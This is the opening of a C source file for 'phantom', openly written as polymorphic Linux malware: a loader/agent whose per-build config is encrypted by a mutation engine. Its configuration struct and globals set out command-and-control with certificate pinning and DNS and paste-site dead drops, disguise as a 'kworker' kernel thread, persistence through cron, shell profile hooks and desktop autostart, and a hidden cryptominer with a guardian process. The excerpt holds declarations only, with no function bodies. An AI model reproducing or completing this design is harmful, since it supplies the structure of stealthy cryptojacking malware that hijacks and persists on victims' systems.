/* phantom.c — Polymorphic Reflective Loader/Agent
 * Target:  Linux x86_64, glibc >= 2.17 or musl
 * Build:   Generated by morph.py mutation engine
 *          DO NOT compile this file directly.
 * Author:  ♥
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <time.h>
#include <signal.h>
#include <fcntl.h>
#include <sched.h>
#include <dirent.h>
#include <sys/syscall.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <sys/sysinfo.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <curl/curl.h>
#include <openssl/evp.h>
#include <openssl/rand.h>
#include <openssl/sha.h>

/* ═══════════════════════════════════════════════════════════════
 * Build-Unique Encrypted Configuration
 * Replaced by morph.py before each compilation.
 * AES-256-CTR, key & IV unique per build.
 * ═══════════════════════════════════════════════════════════════ */

static const uint8_t EK[32] = { /*MORPH_KEY*/ };
static const uint8_t EIV[16] = { /*MORPH_IV*/ };
static const uint8_t CB[] = { /*MORPH_CFG*/ };
static const uint32_t CB_LEN = sizeof(CB);

/* Certificate fingerprint for C2 pinning (SHA-256 of DER-encoded cert) */
static const uint8_t C2_CERT_FP[32] = { /*MORPH_CERT_FP*/ };

struct phantom_cfg {
    char     c2_url[256];
    char     c2_fallback_dns[128];    /* DNS TXT domain for dead drop   */
    char     c2_fallback_paste[256];  /* Paste URL for dead drop        */
    char     proc_name[16];           /* prctl name: "kworker/3:0"      */
    char     proc_cmdline[256];       /* argv[0]: "[kworker/3:0-events]"*/
    char     cron_entry[512];
    char     profile_hook[512];
    char     xdg_desktop[1024];
    char     agent_id[65];
    uint32_t beacon_base_sec;
    float    beacon_jitter;
    uint16_t tunnel_port;             /* local Stratum listen port       */
    uint8_t  max_cpu_pct;
    uint8_t  self_path[512];          /* where we wrote ourselves        */
};

static struct phantom_cfg G;
static volatile pid_t g_miner_pid  = -1;
static volatile pid_t g_guardian   = -1;
static volatile int   g_running    = 1;
static char          *g_argv0_base = NULL;
static size_t         g_argv_space = 0;
